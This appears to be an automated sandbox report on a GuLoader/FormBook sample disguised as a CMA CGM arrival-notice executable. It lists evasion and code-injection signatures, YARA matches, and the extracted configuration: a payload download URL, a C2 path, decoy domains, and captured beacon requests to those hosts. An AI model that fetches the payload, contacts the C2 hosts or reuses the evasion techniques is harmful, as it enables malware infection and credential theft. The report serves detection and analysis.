Windows Analysis Report NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe

Overview

General Information

Sample Name: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
Analysis ID: 482590
MD5: e8bceea59b2074bd08bf68ab55ecdf3e
SHA1: 8b62bf811b03fe25924ef6ff4d4afd89c902f7cd
SHA256: 0b4684d82509a6e7e0c1cb63174bf68d182ccff75a3d19f16821127605d636b8
Tags: exe
Infos:

Most interesting Screenshot:

Detection

GuLoader FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Generic Dropper
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Initial sample is a PE file and has a suspicious name
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
PE file contains strange resources
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Found malware configuration
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Malware Configuration Extractor: GuLoader {"Payload URL": "https://www.paulassinkarchitect.nl/bin_fDiyu115.bin"}
Source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.acooll.com/kbl2/"], "decoy": ["beckyhartpcpublishers.com", "durangosouladventures.com", "taylormakeyourlife.com", "vs88333.com", "electromoto.net", "kratusconsultoria.com", "ecolightingsolution.com", "changethenarrowtive.com", "interpunctto.com", "thelogicsticks.com", "priorpublic.com", "altamirasound.com", "zx136.com", "everythingswallow.com", "rlmwebcreations.com", "zogaripet.com", "stewco360.com", "cassiwalsh.com", "syst.taipei", "thefairwaywithin.com", "barrows66.online", "tablebarn.net", "gabrielladasilva.com", "anqiu.tech", "store504.com", "findmytribe.online", "hrlaboris.com", "packetin.com", "managinginit.com", "sfseminars.com", "evieguest.com", "toptanbezmaske.com", "veryzocn.com", "frendapp.net", "maraging-trade.com", "allinonemigration.com", "waifufood.com", "advancepestcontrol.website", "onetimerecovery.com", "theranchsmokehouse.com", "executivehomefinance.com", "gotothisnotary.com", "tousentrepreneur.com", "flow-dynamics.online", "open-numeric-center.com", "itonlylookshard.com", "losangelescustomupholstery.com", "wichitavillagefleamarket.com", "tigerlottotips.com", "videoquests.com", "osdentalcol.com", "easypercetakan.com", "havensretreatspa.com", "7-fwd.com", "bumbles.online", "microsoftjob.com", "wxsjykj.com", "numberoneratedinfiveg.com", "taylorservewest.com", "normalblue.com", "yes2synergy.com", "dominionhavanese.com", "tranmanh.net", "tanja-wenzel.com"]}
Multi AV Scanner detection for submitted file
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Virustotal: Detection: 25% Perma Link
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe ReversingLabs: Detection: 18%
Yara detected FormBook
Source: Yara match File source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORY
Antivirus or Machine Learning detection for unpacked file
Source: 14.2.rundll32.exe.a04480.0.unpack Avira: Label: TR/Dropper.Gen
Source: 14.2.rundll32.exe.4d6f834.4.unpack Avira: Label: TR/Dropper.Gen

Compliance:

barindex
Uses 32bit PE files
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 91.184.0.38:443 -> 192.168.2.4:49817 version: TLS 1.2
Source: Binary string: wntdll.pdbUGP source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1263512131.000000001E6FF000.00000040.00000001.sdmp, rundll32.exe, 0000000E.00000002.1746538018.0000000004840000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, rundll32.exe
Source: Binary string: rundll32.pdb source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258368762.00000000000D0000.00000040.00020000.sdmp
Source: Binary string: rundll32.pdbGCTL source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258368762.00000000000D0000.00000040.00020000.sdmp

Networking:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 209.99.40.222 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 142.111.236.6 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.microsoftjob.com
Source: C:\Windows\explorer.exe Network Connect: 160.153.136.3 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.wxsjykj.com
Source: C:\Windows\explorer.exe Domain query: www.everythingswallow.com
Source: C:\Windows\explorer.exe Domain query: www.acooll.com
Source: C:\Windows\explorer.exe Network Connect: 44.227.76.166 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.priorpublic.com
Source: C:\Windows\explorer.exe Network Connect: 91.195.240.117 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 54.65.172.3 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.taylormakeyourlife.com
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.beckyhartpcpublishers.com
Source: C:\Windows\explorer.exe Domain query: www.rlmwebcreations.com
Source: C:\Windows\explorer.exe Domain query: www.dominionhavanese.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.acooll.com/kbl2/
Source: Malware configuration extractor URLs: https://www.paulassinkarchitect.nl/bin_fDiyu115.bin
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SEDO-ASDE SEDO-ASDE
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /kbl2/?X8sl8h70=Uk/4fiNFIrAENImNkq5NhDo1aeiSVlAy2lomCsVKXqRgqDXOUaCk1Fhsw/s2uep8GWm3&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.everythingswallow.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /kbl2/?X8sl8h70=mNAOX+y4WXabTwndEsz1KZpSG28Pw83WrUohbTsiXwD/y5SMj6F01NR7fqmkJVRgJocs&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.priorpublic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /kbl2/?X8sl8h70=daE5tP1a5Tc9nw3OtdYckdcxhowCMZpeWCRMBVYqZOqgoniMKTEvOPxT2vVKGCSF49+A&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.taylormakeyourlife.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /kbl2/?X8sl8h70=ocgDBp8RB+Xp1FSN2g/g4Fu1UIpmvfcN211VFkYNpS2VJIx3qol2ed8JVuLDA1eIgF2c&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.rlmwebcreations.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /kbl2/?X8sl8h70=5OG5RXDxO3BYZOT/IvPQY/yLQe21T/UiDIo1icq4/yLbFOipVZEGR/EEpdeKVoDmItdG&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.beckyhartpcpublishers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /kbl2/?X8sl8h70=upAO5Ht9q/opBGhdUuHFjp2/wcU+ulAfJwkqIqPnAJrU/+6TNAZ9b0v5p0TfArP7uW32&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.microsoftjob.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /kbl2/?X8sl8h70=/SwPZpUeYcfjW+l1nZwpHh870fYqR0AAiYUZy0bqwmsGzS5J8V1b3P/tjC4QUhyDJ9qB&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.wxsjykj.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /kbl2/?X8sl8h70=JtyqbAMv8x4sWEmHDQcRdFhMiIOVFEssFVbQ4gFCjctfMjv3XBR0P1btq5GzI/zqaQLK&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.acooll.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 91.195.240.117 91.195.240.117
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /bin_fDiyu115.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.paulassinkarchitect.nlCache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 13 Sep 2021 21:01:26 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000003.1187824235.00000000009C6000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.2
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/arrow.png)
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/bodybg.png)
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/kwbg.jpg)
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/libg.png)
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/libgh.png)
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/logo.png)
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/search-icon.png)
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://www.rlmwebcreations.com
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://www.rlmwebcreations.com/10_Best_Mutual_Funds.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrO
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://www.rlmwebcreations.com/Anti_Wrinkle_Creams.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://www.rlmwebcreations.com/Best_Penny_Stocks.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3E
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://www.rlmwebcreations.com/Cheap_Air_Tickets.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3E
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://www.rlmwebcreations.com/Parental_Control.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3Er
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://www.rlmwebcreations.com/Top_Smart_Phones.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3Er
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://www.rlmwebcreations.com/display.cfm
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://www.rlmwebcreations.com/kbl2/?X8sl8h70=ocgDBp8RB
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: http://www.rlmwebcreations.com/song_lyrics.cfm?fp=N%2ByQ21Moi3QrdS1dGytLFd88mWox3cgRoXqQSrOO3ErTA9i3
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: https://www.colorfulbox.jp/?adref=nsexp_ad&argument=DLHtsrgz&dmai=a5b5a809168886
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258590873.000000000098E000.00000004.00000020.sdmp String found in binary or memory: https://www.paulassinkarchitect.nl/
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258443374.0000000000740000.00000004.00000001.sdmp String found in binary or memory: https://www.paulassinkarchitect.nl/bin_fDiyu115.bin
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258523139.0000000000957000.00000004.00000020.sdmp String found in binary or memory: https://www.paulassinkarchitect.nl/bin_fDiyu115.bin7
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258523139.0000000000957000.00000004.00000020.sdmp String found in binary or memory: https://www.paulassinkarchitect.nl/bin_fDiyu115.bin?
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258523139.0000000000957000.00000004.00000020.sdmp String found in binary or memory: https://www.paulassinkarchitect.nl/bin_fDiyu115.binW
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258523139.0000000000957000.00000004.00000020.sdmp String found in binary or memory: https://www.paulassinkarchitect.nl/bin_fDiyu115.binqs
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 0000000C.00000002.1258443374.0000000000740000.00000004.00000001.sdmp String found in binary or memory: https://www.paulassinkarchitect.nl/bin_fDiyu115.binwininet.dllMozilla/5.0
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: https://www.value-domain.com/
Source: rundll32.exe, 0000000E.00000002.1747208962.000000000525F000.00000004.00020000.sdmp String found in binary or memory: https://www.value-domain.com/modall.php
Source: unknown DNS traffic detected: queries for: www.paulassinkarchitect.nl
Source: global traffic HTTP traffic detected: GET /bin_fDiyu115.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.paulassinkarchitect.nlCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /kbl2/?X8sl8h70=Uk/4fiNFIrAENImNkq5NhDo1aeiSVlAy2lomCsVKXqRgqDXOUaCk1Fhsw/s2uep8GWm3&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.everythingswallow.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /kbl2/?X8sl8h70=mNAOX+y4WXabTwndEsz1KZpSG28Pw83WrUohbTsiXwD/y5SMj6F01NR7fqmkJVRgJocs&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.priorpublic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /kbl2/?X8sl8h70=daE5tP1a5Tc9nw3OtdYckdcxhowCMZpeWCRMBVYqZOqgoniMKTEvOPxT2vVKGCSF49+A&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.taylormakeyourlife.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /kbl2/?X8sl8h70=ocgDBp8RB+Xp1FSN2g/g4Fu1UIpmvfcN211VFkYNpS2VJIx3qol2ed8JVuLDA1eIgF2c&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.rlmwebcreations.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /kbl2/?X8sl8h70=5OG5RXDxO3BYZOT/IvPQY/yLQe21T/UiDIo1icq4/yLbFOipVZEGR/EEpdeKVoDmItdG&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.beckyhartpcpublishers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /kbl2/?X8sl8h70=upAO5Ht9q/opBGhdUuHFjp2/wcU+ulAfJwkqIqPnAJrU/+6TNAZ9b0v5p0TfArP7uW32&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.microsoftjob.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /kbl2/?X8sl8h70=/SwPZpUeYcfjW+l1nZwpHh870fYqR0AAiYUZy0bqwmsGzS5J8V1b3P/tjC4QUhyDJ9qB&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.wxsjykj.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /kbl2/?X8sl8h70=JtyqbAMv8x4sWEmHDQcRdFhMiIOVFEssFVbQ4gFCjctfMjv3XBR0P1btq5GzI/zqaQLK&t48xlt=YTUh7PIXtPD8u2 HTTP/1.1Host: www.acooll.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: unknown HTTPS traffic detected: 91.184.0.38:443 -> 192.168.2.4:49817 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe, 00000000.00000002.929269162.00000000007BA000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 0000000E.00000002.1747108228.0000000004D6F000.00000004.00020000.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.1745033505.0000000000B50000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.1744536176.0000000000800000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000000.1216786397.000000000690A000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.1744759427.0000000000A04000.00000004.00000020.sdmp, type: MEMORY Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe
Uses 32bit PE files
Source: NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 0000000E.00000002.1747108228.0000000004D6F000.00000004.00020000.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.1258337207.00000000000A0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.1744958474.0000000000B20000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000000.1239560173.000000000690A000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.1261762873.000000001E2B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
